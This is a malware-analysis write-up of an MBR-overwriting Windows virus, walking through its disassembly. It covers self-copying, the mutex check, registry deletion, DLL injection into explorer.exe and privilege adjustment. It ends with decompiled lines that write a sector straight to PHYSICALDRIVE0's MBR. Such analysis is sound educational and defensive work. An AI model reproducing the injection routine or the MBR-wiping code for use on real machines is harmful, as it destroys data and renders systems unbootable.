Someone far more experienced has already analyzed this virus; I went through it myself for learning purposes.
Original thread:
http://www.52pojie.cn/forum.php?mod=viewthread&tid=204176&page=1&extra=
Overview
A virus that modifies the MBR.
Symptoms on an infected system
After infection the machine no longer boots normally after a restart; it only displays a string.
File system changes
Modifies the MBR; drops a txt file and a dll
Registry changes
Deletes the HKEY_CURRENT_USER subkey Keyboard Layout\Preload, which changes the input-method (IME) settings
Network symptoms
None
004019B9 |. FF15 D0804000 call dword ptr ds:[<&KERNEL32.GetCommandLineA>] ; [GetCommandLineA
004019BF |. A3 04D14000 mov dword ptr ds:[0x40D104],eax
004019C4 |. E8 8E110000 call OhMyGod.00402B57
004019C9 |. A3 08BB4000 mov dword ptr ds:[0x40BB08],eax
004019CE |. E8 370F0000 call OhMyGod.0040290A
004019D3 |. E8 790E0000 call OhMyGod.00402851
004019D8 |. E8 EE0B0000 call OhMyGod.004025CB
004019DD |. A1 48BB4000 mov eax,dword ptr ds:[0x40BB48]
004019E2 |. A3 4CBB4000 mov dword ptr ds:[0x40BB4C],eax
004019E7 |. 50 push eax
004019E8 |. FF35 40BB4000 push dword ptr ds:[0x40BB40]
004019EE |. FF35 3CBB4000 push dword ptr ds:[0x40BB3C]
004019F4 |. E8 A7FDFFFF call OhMyGod.004017A0 // set a breakpoint here
004019F9 |. 83C4 0C add esp,0xC
004019FC |. 8945 E4 mov [local.7],eax
004019FF |. 50 push eax
00401A00 |. E8 F30B0000 call OhMyGod.004025F8
004017A0 /$ E8 FBFEFFFF call OhMyGod.004016A0
004017A5 |. E8 76FDFFFF call OhMyGod.00401520
004017AA |. E8 A1F8FFFF call OhMyGod.00401050
004017AF |. E8 5CFDFFFF call OhMyGod.00401510
004017B4 |. E8 C7F8FFFF call OhMyGod.00401080
004017B9 |. E8 92F9FFFF call OhMyGod.00401150
004017BE |. E8 0DFFFFFF call OhMyGod.004016D0
004017C3 |. E8 58F8FFFF call OhMyGod.00401020
004017C8 |. 6A 00 push 0x0 ; /Style = MB_OK|MB_APPLMODAL
004017CA |. 68 1C914000 push OhMyGod.0040911C ; |Title = "111"
004017CF |. 68 14914000 push OhMyGod.00409114 ; |Text = "Good"
004017D4 |. 6A 00 push 0x0 ; |hOwner = NULL
004017D6 |. FF15 5C814000 call dword ptr ds:[<&USER32.MessageBoxA>] ; \MessageBoxA
First CALL: 004017A0 /$ E8 FBFEFFFF call OhMyGod.004016A0
004016A0 |$ 6A 00 push 0x0 ; /pThreadId = NULL
004016A2 |. 6A 00 push 0x0 ; |CreationFlags = 0
004016A4 |. 6A 00 push 0x0 ; |pThreadParm = NULL
004016A6 |. 68 60154000 push OhMyGod.00401560 ; |ThreadFunction = OhMyGod.00401560
004016AB |. 6A 00 push 0x0 ; |StackSize = 0
004016AD |. 6A 00 push 0x0 ; |pSecurity = NULL
004016AF |. FF15 74804000 call dword ptr ds:[<&KERNEL32.CreateThread>] ; \CreateThread
004016B5 |. 50 push eax ; /hObject
004016B6 |. FF15 B0804000 call dword ptr ds:[<&KERNEL32.CloseHandle>] ; \CloseHandle
A thread is created; first go to 00401560 . 83EC 0C sub esp,0xC and set a breakpoint there.
Second CALL: 004017A5 |. E8 76FDFFFF call OhMyGod.00401520
00401520 /$ 68 E0904000 push OhMyGod.004090E0 ; /MutexName = "jinguizi"
00401525 |. 6A 00 push 0x0 ; |InitialOwner = FALSE
00401527 |. 6A 00 push 0x0 ; |pSecurity = NULL
00401529 |. FF15 68804000 call dword ptr ds:[<&KERNEL32.CreateMutexA>] ; \CreateMutexA
0040152F |. 85C0 test eax,eax
00401531 |. 74 26 je XOhMyGod.00401559
00401533 |. FF15 C0804000 call dword ptr ds:[<&KERNEL32.GetLastError>] ; [GetLastError
00401539 |. 3D B7000000 cmp eax,0xB7
0040153E |. 75 19 jnz XOhMyGod.00401559
00401540 |. 6A 00 push 0x0 ; /Style = MB_OK|MB_APPLMODAL
00401542 |. 6A 00 push 0x0 ; |Title = NULL
00401544 |. 68 CC904000 push OhMyGod.004090CC ; |Text = "只能有一个程序运行" (only one instance of the program may run)
00401549 |. 6A 00 push 0x0 ; |hOwner = NULL
0040154B |. FF15 5C814000 call dword ptr ds:[<&USER32.MessageBoxA>] ; \MessageBoxA
00401551 |. 6A 00 push 0x0 ; /ExitCode = 0
00401553 |. FF15 60804000 call dword ptr ds:[<&KERNEL32.ExitProcess>] ; \ExitProcess
00401559 \> C3 retn
Creates a mutex (GetLastError == 0xB7, ERROR_ALREADY_EXISTS) so that only one instance of the program can run.
Third CALL: 004017AA |. E8 A1F8FFFF call OhMyGod.00401050
00401050 /$ 51 push ecx
00401051 |. 8D4424 00 lea eax,dword ptr ss:[esp]
00401055 |. 50 push eax ; /pHandle
00401056 |. 6A 08 push 0x8 ; |Access = KEY_ENUMERATE_SUB_KEYS
00401058 |. 6A 00 push 0x0 ; |Reserved = 0
0040105A |. 68 44904000 push OhMyGod.00409044 ; |Subkey = "Keyboard Layout\Preload"
0040105F |. 68 01000080 push 0x80000001 ; |hKey = HKEY_CURRENT_USER
00401064 |. FF15 1C804000 call dword ptr ds:[<&ADVAPI32.RegOpenKeyExA>] ; \RegOpenKeyExA
0040106A |. 68 44904000 push OhMyGod.00409044 ; /Subkey = "Keyboard Layout\Preload"
0040106F |. 68 01000080 push 0x80000001 ; |hKey = HKEY_CURRENT_USER
00401074 |. FF15 20804000 call dword ptr ds:[<&ADVAPI32.RegDeleteKeyA>] ; \RegDeleteKeyA
0040107A |. 59 pop ecx
0040107B \. C3 retn
Deletes the registry key HKEY_CURRENT_USER\Keyboard Layout\Preload,
which accomplishes the input-method change.
Fourth CALL: 004017AF |. E8 5CFDFFFF call OhMyGod.00401510
Hides the foreground window.
Fifth CALL:
Writes "金龟子真棒!" ("JinGuiZi is awesome!") to
C:\WINDOWS\4200460.txt
Sixth CALL:
VirtualProtect changes the page protection, then WriteProcessMemory hooks MessageBox.
Seventh CALL:
004016E9 |. 68 80000000 push 0x80 ; /BufSize = 80 (128.)
004016EE |. F3:AB rep stos dword ptr es:[edi] ; |
004016F0 |. 66:AB stos word ptr es:[edi] ; |
004016F2 |. AA stos byte ptr es:[edi] ; |
004016F3 |. 8D4424 14 lea eax,dword ptr ss:[esp+0x14] ; |
004016F7 |. 50 push eax ; |PathBuffer
004016F8 |. 6A 00 push 0x0 ; |hModule = NULL
004016FA |. FF15 80804000 call dword ptr ds:[<&KERNEL32.GetModuleFileNameA>] ; \GetModuleFileNameA
00401700 |. 8B1D B8804000 mov ebx,dword ptr ds:[<&KERNEL32.CreateFileA>] ; kernel32.CreateFileA
00401706 |. 6A 00 push 0x0 ; /hTemplateFile = NULL
00401708 |. 68 80000000 push 0x80 ; |Attributes = NORMAL
0040170D |. 6A 03 push 0x3 ; |Mode = OPEN_EXISTING
0040170F |. 6A 00 push 0x0 ; |pSecurity = NULL
00401711 |. 6A 03 push 0x3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401713 |. 8D4C24 24 lea ecx,dword ptr ss:[esp+0x24] ; |
00401717 |. 68 00000010 push 0x10000000 ; |Access = GENERIC_ALL
0040171C |. 51 push ecx ; |FileName
0040171D |. FFD3 call ebx ; \CreateFileA
0040171F |. 8D5424 0C lea edx,dword ptr ss:[esp+0xC]
00401723 |. 8BF0 mov esi,eax
00401725 |. 52 push edx ; /pFileSizeHigh
00401726 |. 56 push esi ; |hFile
00401727 |. FF15 7C804000 call dword ptr ds:[<&KERNEL32.GetFileSize>] ; \GetFileSize
0040172D |. 8B4424 0C mov eax,dword ptr ss:[esp+0xC]
00401731 |. 6A 04 push 0x4 ; /flProtect = 4
00401733 |. 68 00100000 push 0x1000 ; |flAllocationType = 1000 (4096.)
00401738 |. 50 push eax ; |dwSize
00401739 |. 6A 00 push 0x0 ; |lpAddress = NULL
0040173B |. 6A 00 push 0x0 ; |hProcess = NULL
0040173D |. FF15 48804000 call dword ptr ds:[<&KERNEL32.VirtualAllocEx>] ; \VirtualAllocEx
00401743 |. 8B5424 0C mov edx,dword ptr ss:[esp+0xC]
00401747 |. 8D4C24 0C lea ecx,dword ptr ss:[esp+0xC]
0040174B |. 6A 00 push 0x0 ; /pOverlapped = NULL
0040174D |. 8BF8 mov edi,eax ; |
0040174F |. 51 push ecx ; |pBytesRead
00401750 |. 52 push edx ; |BytesToRead
00401751 |. 57 push edi ; |Buffer
00401752 |. 56 push esi ; |hFile
00401753 |. FF15 78804000 call dword ptr ds:[<&KERNEL32.ReadFile>] ; \ReadFile
00401759 |. 6A 00 push 0x0 ; /hTemplateFile = NULL
0040175B |. 68 80000000 push 0x80 ; |Attributes = NORMAL
00401760 |. 6A 02 push 0x2 ; |Mode = CREATE_ALWAYS
00401762 |. 6A 00 push 0x0 ; |pSecurity = NULL
00401764 |. 6A 03 push 0x3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401766 |. 68 00000010 push 0x10000000 ; |Access = GENERIC_ALL
0040176B |. 68 F4904000 push OhMyGod.004090F4 ; |FileName = "C:\WINDOWS\SYSTEM32\GuiZi.exe"
00401770 |. FFD3 call ebx ; \CreateFileA
00401772 |. 8B4C24 0C mov ecx,dword ptr ss:[esp+0xC]
00401776 |. 8BD8 mov ebx,eax
00401778 |. 8D4424 0C lea eax,dword ptr ss:[esp+0xC]
0040177C |. 6A 00 push 0x0 ; /pOverlapped = NULL
0040177E |. 50 push eax ; |pBytesWritten
0040177F |. 51 push ecx ; |nBytesToWrite
00401780 |. 57 push edi ; |Buffer
00401781 |. 53 push ebx ; |hFile
00401782 |. FF15 BC804000 call dword ptr ds:[<&KERNEL32.WriteFile>] ; \WriteFile
00401788 |. 8B3D B0804000 mov edi,dword ptr ds:[<&KERNEL32.CloseHandle>] ; kernel32.CloseHandle
0040178E |. 53 push ebx ; /hObject
0040178F |. FFD7 call edi ; \CloseHandle
00401791 |. 56 push esi ; /hObject
00401792 |. FFD7 call edi ; \CloseHandle
Allocates a buffer the same size as its own file, reads the file into it, and writes it back out as C:\WINDOWS\SYSTEM32\GuiZi.exe (a copy of itself).
Last CALL (the eighth):
00401020 /$ 8A0D 30904000 mov cl,byte ptr ds:[0x409030]
00401026 |. 56 push esi
00401027 |. 33F6 xor esi,esi
00401029 |. 33D2 xor edx,edx
0040102B |. 84C9 test cl,cl
0040102D |. 74 1C je XOhMyGod.0040104B
0040102F |. B8 30904000 mov eax,OhMyGod.00409030 ; ASCII "Shabisafhlfiakhfdka"
00401034 |> 02CA /add cl,dl
00401036 |. 03D6 |add edx,esi
00401038 |. 46 |inc esi
00401039 |. 8808 |mov byte ptr ds:[eax],cl
0040103B |. 8A8E 30904000 |mov cl,byte ptr ds:[esi+0x409030]
00401041 |. 8D86 30904000 |lea eax,dword ptr ds:[esi+0x409030]
00401047 |. 84C9 |test cl,cl
00401049 |.^ 75 E9 \jnz XOhMyGod.00401034
0040104B |> 5E pop esi
0040104C \. C3 retn
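As an added example for this writeup (not code from the sample or the original thread), the loop above re-implemented in Python so its effect on the listed string can be checked: each byte receives the low byte of a running sum that grows by 0, 1, 2, ... per iteration, i.e. byte i gets i*(i-1)/2 mod 256, and processing stops at the first NUL. The closed-form offset and its inverse are included so an analyst can recover the input from the output.

```python
# Re-implementation of the byte loop at 00401020 (added example for this
# writeup, not code from the sample). The sample string is the ASCII operand
# shown at 00409030 in the listing.

SAMPLE = b"Shabisafhlfiakhfdka"


def transform_in_place(buf: bytearray) -> bytearray:
    """Step through the loop with the same registers (cl, dl, esi)."""
    if not buf or buf[0] == 0:           # test cl,cl / je: empty string, nothing to do
        return buf
    esi = 0                              # index of the byte being processed
    edx = 0                              # running sum 0, 0, 1, 3, 6, 10, ...
    cl = buf[0]
    while True:
        cl = (cl + (edx & 0xFF)) & 0xFF  # add cl,dl   (only the low byte matters)
        edx += esi                       # add edx,esi
        esi += 1                         # inc esi
        buf[esi - 1] = cl                # mov [eax],cl
        if esi >= len(buf) or buf[esi] == 0:  # mov cl,[esi+base] / test cl,cl / jnz
            return buf                   # next input byte is NUL: done
        cl = buf[esi]


def transform(data: bytes) -> bytes:
    """Non-destructive wrapper around transform_in_place."""
    return bytes(transform_in_place(bytearray(data)))


def offset_for(i: int) -> int:
    """Closed form of the value the loop adds to byte i (triangular number mod 256)."""
    return (i * (i - 1) // 2) & 0xFF


def invert(data: bytes) -> bytes:
    """Undo the transform: subtract the per-position offset from each byte."""
    return bytes((b - offset_for(i)) & 0xFF for i, b in enumerate(data))


if __name__ == "__main__":
    out = transform(SAMPLE)
    print(out.hex())                     # mostly non-printable: not a readable string
    assert invert(out) == SAMPLE
```

Run on the listed string the output is not printable past the first eight bytes, which is consistent with the MessageBox afterwards showing "Good"/"111" rather than this buffer.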
After the string operation:
004017C8 |. 6A 00 push 0x0 ; /Style = MB_OK|MB_APPLMODAL
004017CA |. 68 1C914000 push OhMyGod.0040911C ; |Title = "111"
004017CF |. 68 14914000 push OhMyGod.00409114 ; |Text = "Good"
004017D4 |. 6A 00 push 0x0 ; |hOwner = NULL
004017D6 |. FF15 5C814000 call dword ptr ds:[<&USER32.MessageBoxA>] ; \MessageBoxA ; pops up the message box
004017DC |. E8 EFFAFFFF call OhMyGod.004012D0
004017E1 |. 6A 00 push 0x0
004017E3 |. 6A 02 push 0x2
004017E5 |. E8 B6FCFFFF call OhMyGod.004014A0
004017EA |. 83C4 08 add esp,0x8
004017ED \. C3 retn
004017DC |. E8 EFFAFFFF call OhMyGod.004012D0
Enumerates processes to find explorer.exe, injects into it via a remote thread, and creates the DLL; details below.
0040135C |. E8 AFFEFFFF call OhMyGod.00401210 - step into this call
Creates C:\WINDOWS\system32\ld.dll (the wsprintfA format in the listing is "%s\%ld.dll" with %ld = 4200460, so the file is named from that number), fills it from a resource, and further down injects it with CreateRemoteThread.
00401230 |. 68 04010000 push 0x104 ; /BufSize = 104 (260.)
00401235 |. 57 push edi ; |Buffer
00401236 |. FF15 34804000 call dword ptr ds:[<&KERNEL32.GetSystemDirectoryA>] ; \GetSystemDirectoryA
0040123C |. 6A 00 push 0x0
0040123E |. E8 E7050000 call OhMyGod.0040182A
00401243 |. 50 push eax
00401244 |. E8 B9050000 call OhMyGod.00401802
00401249 |. E8 BE050000 call OhMyGod.0040180C
0040124E |. 68 0C184000 push OhMyGod.0040180C ; /<%ld> = 40180C (4200460.)
00401253 |. 57 push edi ; |<%s>
00401254 |. 68 9C904000 push OhMyGod.0040909C ; |Format = "%s\%ld.dll"
00401259 |. 56 push esi ; |s
0040125A |. FF15 58814000 call dword ptr ds:[<&USER32.wsprintfA>] ; \wsprintfA
00401260 |. 83C4 18 add esp,0x18
00401263 |. 6A 00 push 0x0 ; /hTemplateFile = NULL
00401265 |. 68 80000000 push 0x80 ; |Attributes = NORMAL
0040126A |. 6A 02 push 0x2 ; |Mode = CREATE_ALWAYS
0040126C |. 6A 00 push 0x0 ; |pSecurity = NULL
0040126E |. 6A 02 push 0x2 ; |ShareMode = FILE_SHARE_WRITE
00401270 |. 68 00000010 push 0x10000000 ; |Access = GENERIC_ALL
00401275 |. 56 push esi ; |FileName
00401276 |. FF15 B8804000 call dword ptr ds:[<&KERNEL32.CreateFileA>] ; \CreateFileA
0040127C |. 68 98904000 push OhMyGod.00409098 ; /ResourceType = "EXE"
00401281 |. 6A 65 push 0x65 ; |ResourceName = 0x65
00401283 |. 6A 00 push 0x0 ; |hModule = NULL
00401285 |. 8BF8 mov edi,eax ; |
00401287 |. FF15 30804000 call dword ptr ds:[<&KERNEL32.FindResourceA>] ; \FindResourceA
0040128D |. 8BD8 mov ebx,eax
0040128F |. 53 push ebx ; /hResource
00401290 |. 6A 00 push 0x0 ; |hModule = NULL
00401292 |. FF15 2C804000 call dword ptr ds:[<&KERNEL32.LoadResource>] ; \LoadResource
00401298 |. 53 push ebx ; /hResource
00401299 |. 6A 00 push 0x0 ; |hModule = NULL
0040129B |. 8BE8 mov ebp,eax ; |
0040129D |. FF15 28804000 call dword ptr ds:[<&KERNEL32.SizeofResource>] ; \SizeofResource
004012A3 |. 8D4C24 10 lea ecx,dword ptr ss:[esp+0x10]
004012A7 |. 6A 00 push 0x0 ; /pOverlapped = NULL
004012A9 |. 51 push ecx ; |pBytesWritten
004012AA |. 50 push eax ; |nBytesToWrite
004012AB |. 55 push ebp ; |Buffer
004012AC |. 57 push edi ; |hFile
004012AD |. FF15 BC804000 call dword ptr ds:[<&KERNEL32.WriteFile>] ; \WriteFile
004012B3 |. 57 push edi ; /hObject
004012B4 |. FF15 B0804000 call dword ptr ds:[<&KERNEL32.CloseHandle>] ; \CloseHandle
Back in 004012D0, the process enumeration loop:
00401337 |. 8D4424 10 |lea eax,dword ptr ss:[esp+0x10]
0040133B |. 50 |push eax ; /lppe
0040133C |. 55 |push ebp ; |hSnapshot
0040133D |. E8 AE040000 |call <jmp.&KERNEL32.Process32Next> ; \Process32Next
00401342 |. 85C0 |test eax,eax
00401344 |.^ 75 B7 \jnz XOhMyGod.004012FD
00401346 |. EB 04 jmp XOhMyGod.0040134C
00401348 |> 8B7C24 18 mov edi,dword ptr ss:[esp+0x18]
0040134C |> 57 push edi ; /ProcessId
0040134D |. 6A 00 push 0x0 ; |Inheritable = FALSE
0040134F |. 68 FF0F1F00 push 0x1F0FFF ; |Access = PROCESS_ALL_ACCESS
00401354 |. FF15 4C804000 call dword ptr ds:[<&KERNEL32.OpenProcess>] ; \OpenProcess
0040135A |. 8BF0 mov esi,eax
0040135C |. E8 AFFEFFFF call OhMyGod.00401210 ; ///////////////////////////////// the important function
00401361 |. 8BD8 mov ebx,eax
00401363 |. 83C9 FF or ecx,0xFFFFFFFF
00401366 |. 8BFB mov edi,ebx
00401368 |. 33C0 xor eax,eax
0040136A |. F2:AE repne scas byte ptr es:[edi]
0040136C |. F7D1 not ecx
0040136E |. 6A 04 push 0x4 ; /flProtect = 4
00401370 |. 49 dec ecx ; |
00401371 |. 68 00100000 push 0x1000 ; |flAllocationType = 1000 (4096.)
00401376 |. 51 push ecx ; |dwSize
00401377 |. 50 push eax ; |lpAddress => NULL
00401378 |. 56 push esi ; |hProcess
00401379 |. FF15 48804000 call dword ptr ds:[<&KERNEL32.VirtualAllocEx>] ; \VirtualAllocEx
0040137F |. 8BE8 mov ebp,eax
00401381 |. 8BFB mov edi,ebx
00401383 |. 83C9 FF or ecx,0xFFFFFFFF
00401386 |. 33C0 xor eax,eax
00401388 |. F2:AE repne scas byte ptr es:[edi]
0040138A |. F7D1 not ecx
0040138C |. 49 dec ecx
0040138D |. 6A 00 push 0x0 ; /pBytesWritten = NULL
0040138F |. 51 push ecx ; |BytesToWrite
00401390 |. 53 push ebx ; |Buffer
00401391 |. 55 push ebp ; |Address
00401392 |. 56 push esi ; |hProcess
00401393 |. FF15 A8804000 call dword ptr ds:[<&KERNEL32.WriteProcessMemory>] ; \WriteProcessMemory
00401399 |. 8B0D 44804000 mov ecx,dword ptr ds:[<&KERNEL32.LoadLibraryA>] ; kernel32.LoadLibraryA
0040139F |. 6A 00 push 0x0 ; /lpThreadId = NULL
004013A1 |. 6A 00 push 0x0 ; |dwCreationFlags = 0
004013A3 |. 55 push ebp ; |lpParameter
004013A4 |. 51 push ecx ; |lpStartAddress => kernel32.LoadLibraryA
004013A5 |. 6A 00 push 0x0 ; |dwStackSize = 0
004013A7 |. 6A 00 push 0x0 ; |lpThreadAttributes
004013A9 |. 56 push esi ; |hProcess
004013AA |. FF15 40804000 call dword ptr ds:[<&KERNEL32.CreateRemoteThread>] ; \CreateRemoteThread
004013B0 |. 8BF8 mov edi,eax
004013B2 |. 6A FF push -0x1 ; /Timeout = INFINITE
004013B4 |. 57 push edi ; |hObject
004013B5 |. FF15 3C804000 call dword ptr ds:[<&KERNEL32.WaitForSingleObject>] ; \WaitForSingleObject
004013BB |. 68 00800000 push 0x8000 ; /dwFreeType = 8000 (32768.)
004013C0 |. 6A 00 push 0x0 ; |dwSize = 0
004013C2 |. 55 push ebp ; |lpAddress
004013C3 |. 56 push esi ; |hProcess
004013C4 |. FF15 38804000 call dword ptr ds:[<&KERNEL32.VirtualFreeEx>] ; \VirtualFreeEx
004013CA |. 56 push esi ; /hObject
004013CB |. 8B35 B0804000 mov esi,dword ptr ds:[<&KERNEL32.CloseHandle>] ; |kernel32.CloseHandle
004013D1 |. FFD6 call esi ; \CloseHandle
004013D3 |. 57 push edi ; /hObject
004013D4 |. FFD6 call esi ; \CloseHandle
004013D6 |. 5F pop edi
004013D7 |. 5E pop esi
004013D8 |. 5D pop ebp
004013D9 |. 5B pop ebx
004013DA |. 81C4 28010000 add esp,0x128
004013E0 \. C3 retn
Continuing down, we see the function that adjusts privileges:
004014C1 |> \57 push edi
004014C2 |. B9 24000000 mov ecx,0x24
004014C7 |. 33C0 xor eax,eax
004014C9 |. 8D7C24 08 lea edi,dword ptr ss:[esp+0x8]
004014CD |. F3:AB rep stos dword ptr es:[edi]
004014CF |. 8D4424 04 lea eax,dword ptr ss:[esp+0x4]
004014D3 |. C74424 04 940>mov dword ptr ss:[esp+0x4],0x94
004014DB |. 50 push eax ; /pVersionInformation
004014DC |. FF15 5C804000 call dword ptr ds:[<&KERNEL32.GetVersionExA>] ; \GetVersionExA
004014E2 |. 85C0 test eax,eax
004014E4 |. 5F pop edi
004014E5 |. 75 07 jnz XOhMyGod.004014EE
004014E7 |. 81C4 94000000 add esp,0x94
004014ED |. C3 retn
004014EE |> 837C24 10 02 cmp dword ptr ss:[esp+0x10],0x2 ; dwPlatformId == VER_PLATFORM_WIN32_NT
004014F3 |. 75 05 jnz XOhMyGod.004014FA
004014F5 |. E8 F6FEFFFF call OhMyGod.004013F0 // this is the privilege-adjusting function
004013F0 /$ 83EC 14 sub esp,0x14
004013F3 |. 33C0 xor eax,eax
004013F5 |. 8D4C24 00 lea ecx,dword ptr ss:[esp]
004013F9 |. 894424 08 mov dword ptr ss:[esp+0x8],eax
004013FD |. 51 push ecx ; /phToken
004013FE |. 894424 10 mov dword ptr ss:[esp+0x10],eax ; |
00401402 |. 6A 28 push 0x28 ; |DesiredAccess = TOKEN_QUERY|TOKEN_ADJUST_PRIVILEGES
00401404 |. C74424 08 000>mov dword ptr ss:[esp+0x8],0x0 ; |
0040140C |. C74424 0C 000>mov dword ptr ss:[esp+0xC],0x0 ; |
00401414 |. 894424 18 mov dword ptr ss:[esp+0x18],eax ; |
00401418 |. FF15 AC804000 call dword ptr ds:[<&KERNEL32.GetCurrentProcess>] ; |[GetCurrentProcess
0040141E |. 50 push eax ; |hProcess
0040141F |. FF15 10804000 call dword ptr ds:[<&ADVAPI32.OpenProcessToken>] ; \OpenProcessToken
00401425 |. 85C0 test eax,eax
00401427 |. 75 04 jnz XOhMyGod.0040142D
00401429 |. 83C4 14 add esp,0x14
0040142C |. C3 retn
0040142D |> 8D5424 08 lea edx,dword ptr ss:[esp+0x8]
00401431 |. 52 push edx ; /pLocalId
00401432 |. 68 B8904000 push OhMyGod.004090B8 ; |Privilege = "SeShutdownPrivilege"
00401437 |. 6A 00 push 0x0 ; |SystemName = NULL
00401439 |. FF15 14804000 call dword ptr ds:[<&ADVAPI32.LookupPrivilegeValueA>] ; \LookupPrivilegeValueA
0040143F |. 85C0 test eax,eax
00401441 |. 75 11 jnz XOhMyGod.00401454
00401443 |. 8B4424 00 mov eax,dword ptr ss:[esp]
00401447 |. 50 push eax ; /hObject
00401448 |. FF15 B0804000 call dword ptr ds:[<&KERNEL32.CloseHandle>] ; \CloseHandle
0040144E |. 33C0 xor eax,eax
00401450 |. 83C4 14 add esp,0x14
00401453 |. C3 retn
00401454 |> 8B5424 00 mov edx,dword ptr ss:[esp]
00401458 |. 6A 00 push 0x0 ; /pRetLen = NULL
0040145A |. 6A 00 push 0x0 ; |pPrevState = NULL
0040145C |. 8D4C24 0C lea ecx,dword ptr ss:[esp+0xC] ; |
00401460 |. 6A 10 push 0x10 ; |PrevStateSize = 10 (16.)
00401462 |. 51 push ecx ; |pNewState
00401463 |. 6A 00 push 0x0 ; |DisableAllPrivileges = FALSE
00401465 |. 52 push edx ; |hToken
00401466 |. C74424 1C 010>mov dword ptr ss:[esp+0x1C],0x1 ; |PrivilegeCount = 1
0040146E |. C74424 28 020>mov dword ptr ss:[esp+0x28],0x2 ; |Attributes = SE_PRIVILEGE_ENABLED
00401476 |. FF15 18804000 call dword ptr ds:[<&ADVAPI32.AdjustTokenPrivileges>] ; \AdjustTokenPrivileges
0040147C |. 85C0 test eax,eax
0040147E |. 75 11 jnz XOhMyGod.00401491
00401480 |. 8B4424 00 mov eax,dword ptr ss:[esp]
00401484 |. 50 push eax ; /hObject
00401485 |. FF15 B0804000 call dword ptr ds:[<&KERNEL32.CloseHandle>] ; \CloseHandle
0040148B |. 33C0 xor eax,eax
0040148D |. 83C4 14 add esp,0x14
00401490 |. C3 retn
Now analyze the new thread; first go to 00401560 . 83EC 0C sub esp,0xC
It looks for a service with the name "ClipSrv":
00401560 . 83EC 0C sub esp,0xC
00401563 . 53 push ebx
00401564 . 55 push ebp
00401565 . 56 push esi
00401566 . 57 push edi
00401567 . E8 E4FAFFFF call OhMyGod.00401050
0040156C . 33DB xor ebx,ebx
0040156E . 68 3F000F00 push 0xF003F
00401573 . 53 push ebx
00401574 . 53 push ebx
00401575 . FF15 04804000 call dword ptr ds:[<&ADVAPI32.OpenSCManagerA>] ; ADVAPI32.OpenSCManagerA // opens the SCM; a service-related function
0040157B . 8BE8 mov ebp,eax
0040157D . 3BEB cmp ebp,ebx
0040157F . 75 0C jnz XOhMyGod.0040158D
00401581 . 5F pop edi
00401582 . 5E pop esi
00401583 . 5D pop ebp
00401584 . 33C0 xor eax,eax
00401586 . 5B pop ebx
00401587 . 83C4 0C add esp,0xC
0040158A . C2 0400 retn 0x4
0040158D > 8D4424 14 lea eax,dword ptr ss:[esp+0x14]
00401591 . 8B3D 08804000 mov edi,dword ptr ds:[<&ADVAPI32.EnumServicesStatusA>] ; ADVAPI32.EnumServicesStatusA
00401597 . 53 push ebx ; /pResumeHandle
00401598 . 8D4C24 14 lea ecx,dword ptr ss:[esp+0x14] ; |
0040159C . 50 push eax ; |pCount
0040159D . 51 push ecx ; |pBytesNeeded
0040159E . 53 push ebx ; |BufSize
0040159F . 53 push ebx ; |pEnumStatus
004015A0 . 6A 03 push 0x3 ; |ServiceState = 3
004015A2 . 6A 3B push 0x3B ; |ServiceType = SERVICE_KERNEL_DRIVER|SERVICE_FILE_SYSTEM_DRIVER|SERVICE_RECOGNIZER_DRIVER|SERVICE_WIN32_OWN_PROCESS|SERVICE_WIN32_SHARE_PROCESS
004015A4 . 55 push ebp ; |hManager
004015A5 . 895C24 34 mov dword ptr ss:[esp+0x34],ebx ; |
004015A9 . 895C24 30 mov dword ptr ss:[esp+0x30],ebx ; |
004015AD . FFD7 call edi ; \EnumServicesStatusA // enumerates the services on the current system.
004015AF . 8B5424 10 mov edx,dword ptr ss:[esp+0x10]
004015B3 . 52 push edx ; /Size
004015B4 . 6A 40 push 0x40 ; |Flags = LPTR
004015B6 . FF15 70804000 call dword ptr ds:[<&KERNEL32.LocalAlloc>] ; \LocalAlloc // allocates the requested number of bytes from the heap.
004015BC . 8BF0 mov esi,eax
004015BE . 3BF3 cmp esi,ebx
004015C0 . 75 13 jnz XOhMyGod.004015D5
004015C2 . 55 push ebp
004015C3 . FF15 0C804000 call dword ptr ds:[<&ADVAPI32.CloseServiceHandle>] ; ADVAPI32.CloseServiceHandle
004015C9 . 5F pop edi
004015CA . 5E pop esi
004015CB . 5D pop ebp
004015CC . 33C0 xor eax,eax
004015CE . 5B pop ebx
004015CF . 83C4 0C add esp,0xC
004015D2 . C2 0400 retn 0x4
004015D5 > \8B5424 10 mov edx,dword ptr ss:[esp+0x10]
004015D9 . 8D4424 14 lea eax,dword ptr ss:[esp+0x14]
004015DD . 53 push ebx
004015DE . 8D4C24 14 lea ecx,dword ptr ss:[esp+0x14]
004015E2 . 50 push eax
004015E3 . 51 push ecx
004015E4 . 52 push edx
004015E5 . 56 push esi
004015E6 . 6A 03 push 0x3
004015E8 . 6A 30 push 0x30
004015EA . 55 push ebp
004015EB . FFD7 call edi ; ADVAPI32.EnumServicesStatusA
004015ED . 85C0 test eax,eax
004015EF . 75 20 jnz XOhMyGod.00401611
004015F1 . 395C24 10 cmp dword ptr ss:[esp+0x10],ebx
004015F5 . 75 1A jnz XOhMyGod.00401611
004015F7 . 55 push ebp
004015F8 . FF15 0C804000 call dword ptr ds:[<&ADVAPI32.CloseServiceHandle>] ; ADVAPI32.CloseServiceHandle
004015FE . 56 push esi ; /hMemory
004015FF . FF15 6C804000 call dword ptr ds:[<&KERNEL32.LocalFree>] ; \LocalFree
00401605 . 5F pop edi
00401606 . 5E pop esi
00401607 . 5D pop ebp
00401608 . 33C0 xor eax,eax
0040160A . 5B pop ebx
0040160B . 83C4 0C add esp,0xC
0040160E . C2 0400 retn 0x4
////////////////////////////////////////////////////////////////////////////////////////////////////////////
Now for the DLL.
In memory the resource sits at 40E060.
Converting that to a file offset (subtract the image base 0x400000, then the 0x2000 difference between the section's virtual address and its raw file offset):
40E060 - 400000 - 2000 = c060
strcpy((char *)FileName, "\\\\.\\PHYSICALDRIVE0");            // raw access to the first physical disk
CreateFileA(FileName, 0xC0000000u, 0, 0, 3u, 0x80u, 0);      // GENERIC_READ|GENERIC_WRITE, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL
WriteFile(hObject, &Buffer, 0x200u, &NumberOfBytesWritten, 0); // one 512-byte sector at offset 0: the MBR
Size: 0x00036041
Loading it shows that it writes the MBR.
After a reboot the screen shows: hacked by JinGuiZi
Copy the MBR out with WinHex, drag it into IDA, and set the loading segment to 0x7c00.
